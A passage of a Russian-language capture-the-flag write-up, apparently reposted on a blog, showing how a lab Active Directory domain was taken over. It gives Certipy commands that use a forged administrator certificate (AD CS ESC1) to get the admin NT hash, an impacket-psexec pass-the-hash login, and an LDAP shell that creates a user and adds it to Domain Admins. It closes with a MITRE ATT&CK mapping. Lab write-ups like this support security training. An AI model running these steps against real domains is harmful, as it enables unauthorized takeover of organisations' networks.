\u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u043e\u0433\u043e \u0436\u0435 Certipy \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c NT-\u0445\u044d\u0448 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438\u043b\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c Kerberos TGT.certipy-ad auth -pfx administrator.pfx -dc-ip 10.112.146.154\u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043f\u043e \u043f\u043e\u0434\u0434\u0435\u043e\u043b\u044c\u043d\u043e\u043c\u0443 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0443\u041a\u0430\u043a \u0432\u0438\u0434\u043d\u043e \u0445\u044d\u0448 \u0430\u0434\u043c\u0438\u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d.\u041a\u043e\u0433\u0434\u0430 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0445\u044d\u0448 \u0430\u0434\u043c\u0438\u043d\u0430, \u043d\u0430\u043c \u043d\u0435 \u043d\u0443\u0436\u0435\u043d \u0435\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044c. \u041c\u044b \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u0441 \u0445\u044d\u0448\u0435\u043c.impacket-psexec -k -hashes :00000000000000 thm.local\/Administrator@labyrinth.thm.local\u0412\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433\u0424\u043b\u0430\u0433 \u0440\u0443\u0442\u0430 \u0432\u0437\u044f\u0442.THM{root&#8217;s_flag_is_here}\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u21162 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u0432\u043e\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0443 \u043c\u0435\u043d\u044f kerberos \u0432\u044b\u0434\u0430\u0432\u0430\u043b \u043e\u0448\u0438\u0431\u043a\u0443.[*] Trying to get TGT&#8230;[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)\u041e\u0448\u0438\u0431\u043a\u0430 KDC_ERR_PADATA_TYPE_NOSUPP \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043d\u0430 DC \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d (\u0438\u043b\u0438 \u0441\u043b\u043e\u043c\u0430\u043d) \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f Kerberos PKINIT-\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0439 \u0444\u0430\u0439\u043b .pfx \u044f \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b.\u0413\u0443\u0433\u043b\u0438\u043d\u0433 \u0434\u0430\u043b \u043e\u0434\u043d\u0443 \u043d\u0430\u0432\u043e\u0434\u043a\u0443, \u0447\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u043e\u0439\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 Schannel \u2014 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0432 LDAP \u043f\u043e TLS-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0443, \u043c\u0438\u043d\u0443\u044f Kerberos \u0446\u0435\u043b\u0438\u043a\u043e\u043c.certipy-ad auth -pfx administrator.pfx -dc-ip 10.114.161.221 -ldap-shell\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0448\u0435\u043b\u043b, \u043e\u0434\u043d\u0430\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u0433\u043e \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043d\u0435\u043b\u044c\u0437\u044f \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433. \u041d\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0432\u044b\u0434\u0430\u0442\u044c \u0435\u043c\u0443 \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0430.# add_user DenAttempting to create user in: %s CN=Users,DC=thm,DC=localAdding new user with username: Den and password: 40B2lsU\/56CP7,6 result: OK# add_user_to_group Den &#171;Domain Admins&#187;Adding user: Den to group Domain Admins result: OK\u0421 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c\u0438 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u043b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u043f\u043e RDP, \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u0444\u043b\u0430\u0433.\u0424\u043b\u0430\u0433 \u0440\u0443\u0442\u0430 \u043f\u043e RDP\u041f\u0430\u0440\u0443 \u0437\u0430\u043c\u0435\u0442\u043e\u043a \u043f\u043e \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044e.\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0443\u0442\u0438\u043b\u0438\u0442\u044b certipy-ad \u0438\u043d\u043e\u0433\u0434\u0430 \u0441\u044b\u043f\u0430\u043b\u0438\u0441\u044c \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438, \u043f\u043e \u0442\u0438\u043f\u0443[!] DNS resolution failed: The DNS query name does not exist: labyrinth.thm.local.Traceback (most recent call last):  File &#171;\/usr\/lib\/python3\/dist-packages\/certipy\/lib\/[target.py](http:\/\/target.py)&#187;, line 442, in resolve\u042d\u0442\u043e \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Certipy \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 dns.resolver \u0438\u0437 Python, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u043e\u0434\u0438\u0442 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0432 DNS-\u0441\u0435\u0440\u0432\u0435\u0440 \u0438\u0437 \/etc\/resolv.conf, \u0430 \u043d\u0435 \u0432 \/etc\/hosts. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0430\u0439\u043f\u0438\u0448\u043d\u0438\u043a \u043c\u0430\u0448\u0438\u043d\u044b \u0432 \u044d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u043f\u0435\u0440\u0432\u044b\u043c. \u041f\u043e\u0440\u044f\u0434\u043e\u043a \u0437\u0434\u0435\u0441\u044c \u0432\u0430\u0436\u0435\u043d!\u0422\u0430\u043a\u0436\u0435 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043c\u0430\u0448\u0438\u043d\u044b \u0443\u0437\u043d\u0430\u043b \u043f\u0440\u043e \u0443\u0442\u0438\u043b\u0438\u0442\u0443 rpcclient. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0442\u0430\u0441\u043a\u0435 \u043f\u0440\u0438 \u043c\u043e\u0435\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0438, \u043e\u043d\u0430 \u043d\u0435 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u043b\u0430\u0441\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0430 \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043c\u0430\u0441\u0441\u0443 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043e\u0442\u0434\u0430\u044e\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b. \u0420\u0430\u0431\u043e\u0442\u0430\u044f \u0441 AD \u043d\u0435\u0440\u0435\u0434\u043a\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f SID (Security Identifier) \u2014 \u044d\u0442\u043e \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, S-1-5-21-3623811015-3361044348-30300820-500), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 Windows \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u043b\u044f \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u0423\u0437\u043d\u0430\u0442\u044c SID \u0430\u0434\u043c\u0438\u043d\u0430 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043c\u043e\u0436\u043d\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b:rpcclient -U &#8216;SUSANNA_MCKNIGHT%PASSWORD&#8217; 10.112.146.154 -c &#171;lookupnames Administrator&#187;\u0415\u0441\u043b\u0438 \u043d\u0430 DC \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u043f\u0430\u0442\u0447 KB5014754, \u0442\u043e \u043f\u0440\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 certipy-ad auth \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u043b\u0435\u0442\u0435\u0442\u044c \u043e\u0442\u043a\u0430\u0437. \u0412 \u044d\u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u044c SID \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u0435\u0433\u043e \u043f\u0440\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\u041c\u0430\u043f\u043f\u0438\u043d\u0433 \u043f\u043e MITRE ATT&amp;CKPhaseTacticTechniqueID\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u043e\u0432DiscoveryNetwork Service DiscoveryT1046\u0413\u043e\u0441\u0442\u0435\u0432\u043e\u0439 SMB \u0434\u043e\u0441\u0442\u0443\u043fDiscoveryAccount Discovery: Domain AccountT1087.002\u041f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435Credential AccessUnsecured Credentials: Credentials In FilesT1552.001\u0412\u0445\u043e\u0434 \u043f\u043e RDP \u0447\u0435\u0440\u0435\u0437 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0435 \u043a\u0440\u0435\u0434\u044bInitial AccessValid Accounts: Domain AccountsT1078.002\u041c\u0430\u043f\u043f\u0438\u043d\u0433 \u0434\u043e\u043c\u0435\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 BloodHoundDiscoveryPermission Groups Discovery: Domain GroupsT1069.002AD CS ESC1 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430Credential AccessSteal or Forge Authentication CertificatesT1649\u0418\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 NT-\u0445\u0435\u0448\u0430 \u0438\u0437 PFXCredential AccessOS Credential DumpingT1003Pass-the-Hash \u0447\u0435\u0440\u0435\u0437 psexecLateral MovementUse Alternate Authentication Material: Pass the HashT1550.002\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-478841","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/478841","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=478841"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/478841\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=478841"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=478841"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=478841"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}